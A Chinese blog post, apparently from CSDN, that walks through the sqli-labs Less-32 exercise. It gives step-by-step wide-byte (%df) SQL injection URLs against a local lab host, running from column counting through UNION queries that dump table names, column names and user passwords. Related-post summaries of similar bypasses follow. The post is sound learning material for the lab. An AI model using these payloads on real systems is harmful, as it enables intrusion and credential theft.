sql_lab之sqli中的宽字节注入(less32)

最新推荐文章于 2024-07-31 22:14:32 发布
最新推荐文章于 2024-07-31 22:14:32 发布
阅读量550 收藏 8
点赞数 15
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59020256/article/details/135164872
版权

宽字节注入(less-32)

1.判断注入类型

http://127.0.0.3/less-32/?id=1

http://127.0.0.3/less-32/?id=1'

出现 \’ 则证明是宽字节注入

2.构成闭环

http://127.0.0.3/less-32/?id=1%df' -- s

显示登录成功则构成闭环

3.查询字段数

http://127.0.0.3/less-32/?id=1%df' order by 4 -- s

http://127.0.0.3/less-32/?id=1%df' order by 3 -- s

说明字段数为3

4.用union联合查询判断回显点

http://127.0.0.3/less-32/?id=-1%df' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询

5.查询数据库名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),3 -- s

6.查询表名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 -- s

爆出security里面的table表

7.查询字段名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 -- s

8.查username和password

http://127.0.0.3/less-32/?id=-1%df' union select 1,group_concat(username),group_concat(password) from users -- s

爱喝水的泡泡
关注
  • 15
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞挖掘】——117、宽字节注入深入刨析
Fly_鹏程万里
06-26 129
窄字节:字符的大小为一个字节时,称其字符为窄字节宽字节:字符的大小为两个字节时,称其字符为宽字节宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等宽字节注入主要是源于程序员设置数据库编码与PHP编码设置为不同的两个编码格式从而导致产生宽字节注入,例如:在使用PHP连接MySQL的时候,很多人都会增加一句。
sql注入绕过addslashes函数-宽字节注入
G208_522的博客
03-15 4679
宽字节注入 宽字节注入要求: 1、数据库的编码为GBK 2、addslashes()函数,检测在单引号前加\ addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(’) 双引号(") 反斜杠(\) NULL 一、单引号探测 http://localhost:8899/sqli-lab/Less-33/index.php?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为G
5--SQL注入(小迪安全)
最新发布
2301_77946674的博客
07-31 879
php文件,通过str_replace函数将select转换成fuck;str_replace函数详解绕过方法:对过滤关键字进行大小写,hex编码,叠写,等价函数替换等等。
sqli-labs闯关记录(Less32-Less37)
BROTHERYY的博客
09-08 247
Advanced InjectionsLess-32 Bypass addslashes()Less-33 Bypass addslashes()Less-34 Bypass Add SLASHESLess-35 why care for addslashes()Less-36 Bypass MySQL Real Escape StringLess-37 MySQL_real_escape_string Less-32 Bypass addslashes() payload:?id=-1%df%27unio
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 631
一丢丢Sqli-labs小练习
sqli-labs-less-32~37
giun的博客
02-14 423
我们先介绍下宽字节注入 原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思 路是将 ‘ 转换为 \’ Less-32 http://127.0.0.1/sqli-labs-master/Less-32/?id=1' 会发现对\进行了过滤 http:/...
Sqli-labs之Less-32和Less-33
→_→
04-30 835
待续。
sqli-labs:less-32宽字节注入
羽的博客
10-19 3079
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句使用的字符串的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
sqli-labs/Less-32
m0_71299382的博客
11-20 318
sqli-labs第三十二关
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1801
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
渗透测试之sqlilab基础(二)Sql注入
LKmnbZ's Blog
11-06 803
1. sql注入的常见漏洞类型 Web phpmyadmin Client navicat 详见https://www.mrwu.red/web/1422.html Mysql 安全配置 参考https://www.jianshu.com/p/7dcaf4c616b0 Mysql 本身漏洞 Cve-2012-2122 h...
sql注入空格被过滤_SQL注入:各种绕过检测的姿势
weixin_39874589的博客
11-16 4261
这一篇主要总结一下sqlilabsadvanced injection的用到的各种绕过,也就是less21-less38。目录1)数据编码2)特殊字符、语法关键字过滤3)存储型注入4)特殊字符转义与宽字节注入5)防火墙保护与http参数污染数据编码http://111.231.88.117/sqli_lab/sqli-labs-php7/Less-21/ http://111.231.88.1...
SQL注入-09】宽字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2530
符号 GBK编码 ’ 27
基于Sqli-Labs靶场的SQL注入-32~37关
Joker
01-09 1256
这篇博客我主要讲宽字节注入,包括一些转义函数的简单讲解。主要理解宽字节注入的原理即可。
sql-labs闯关32~37
qq_44663230的博客
09-04 2096
sql-labs闯关32~37 宽字节注入集合
sqli-labs (less-32)
kukudeshuo的博客
03-13 2007
sqli-labs (less-32) 进入32关,输入 http://127.0.0.1/sql1/Less-32/?id=1 http://127.0.0.1/sql1/Less-32/?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,
sqli-labs靶场实现(九)【宽字节注入(1)、宽字节注入(2)】(less-33、less-32具体步骤+图文详解)
weixin_46709219的博客
01-03 1180
一)宽字节注入 1)宽字节注入基础 2)宽字节注入代码分析 3)宽字节SQL注入演示 4)sqlmap安全检测 —————————————————————————————————————————————————————— 一)宽字节注入 1)宽字节注入基础 GBK编码是占用两个字节,ASCII编码是占用一个字节。在PHP的编码方式为GBK,在函数执行添加的是ASCII编码,在mysql国默认字符集是GBK等宽字节字符集(GBK属于宽字符集的一种),而mysql使用的默认的GBK编码方式是导致宽字
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值